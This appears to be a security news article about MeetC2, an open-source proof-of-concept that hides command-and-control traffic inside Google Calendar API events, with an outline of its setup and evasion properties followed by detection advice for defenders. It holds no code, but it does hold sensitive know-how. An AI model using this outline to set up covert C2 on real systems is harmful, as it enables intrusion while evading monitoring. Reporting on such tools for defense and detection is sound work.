A novel serverless command-and-control (C2) technique that abuses Google Calendar APIs to obscure malicious traffic inside trusted cloud services.
Dubbed MeetC2, this lightweight, cross-platform proof-of-concept demonstrates how adversaries can seamlessly blend C2 communications into everyday SaaS usage, presenting fresh detection, telemetry, and response challenges for red and blue teams alike.
In a recent internal purple-team exercise, security engineers observed how easily traffic to familiar Google domains slipped past traditional network defenses.
By crafting a minimal “organizer” and “guest” agent that leverage standard Calendar API endpoints, attackers can issue commands and receive responses entirely within legitimate HTTPS requests to oauth2.googleapis.com and www.googleapis.com—domains normally whitelisted in corporate environments.
Security teams have discovered, the guest agent polls the Google Calendar “events” endpoint every 30 seconds, invisibly checking for new entries.
The organizer agent, operated from an attacker host, injects commands into the “summary” field of a newly created event, formatted as “Meeting from nobody: [COMMAND]”.
When the guest agent retrieves and executes that command, it updates the same event’s “description” field via a PUT request, embedding the command output inside an [OUTPUT]…[/OUTPUT] block.
This method requires no custom server infrastructure and leaves minimal footprint, as all C2 exchanges are routed through Google’s own API gateways.
Setting up MeetC2 requires just a few steps within the Google Cloud Console. Analysts must enable the Calendar API for a project, create a service account with event-modification permissions, and share a dedicated calendar with that service account.
With the downloaded JSON key renamed to credentials.json, a single build script compiles both organizer and guest binaries.
Operators then run the organizer binary pointing at the target calendar ID while the guest binary silently polls on compromised hosts.
In practical tests, MeetC2 executed commands such as whoami, uname -a, and more clandestine reconnaissance operations without triggering standard data-loss prevention or intrusion-prevention systems.
Because the API calls mimic valid calendar synchronization traffic, they blend into both client and server logs, evading signature-based detections. The limited network noise and absence of anomalous DNS lookups further complicate detection.
Blue teams can replicate MeetC2 in controlled environments to validate their cloud-abuse detection capabilities.
This proof-of-concept draws inspiration from earlier “GC2-sheet” implementations but refines OpSec considerations and streamlines cross-platform compatibility.
By instrumenting API gateway logs, teams can monitor for unusual patterns, such as high-frequency event creations and updates from a single service account.
Leveraging Google Cloud Audit Logs to flag repetitive Calendar API calls or inspecting event payloads for suspicious summary or description field content can surface covert channels.
Additionally, third-party app governance tools should enforce tighter restrictions on service-account permissions and alert on calendar-sharing changes.
The MeetC2 project is open-source and available on GitHub, offering defenders an actionable platform to test responses to cloud-native C2 operations.
Developers caution that while functional, further improvements could harden the guest binary against endpoint forensics and strengthen operational security.
As adversaries continue to innovate with serverless and cloud-based C2 approaches, security teams must shift from perimeter-focused defenses to deeper, service-level telemetry and anomaly detection.
Demonstrations like MeetC2 underscore the importance of visibility within trusted SaaS domains and the need for adaptive defenses that inspect both metadata and payload content.
By exercising detection rules and response playbooks against controlled cloud-abuse scenarios, organizations can stay ahead of evolving threats hiding in plain sight.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
Source link
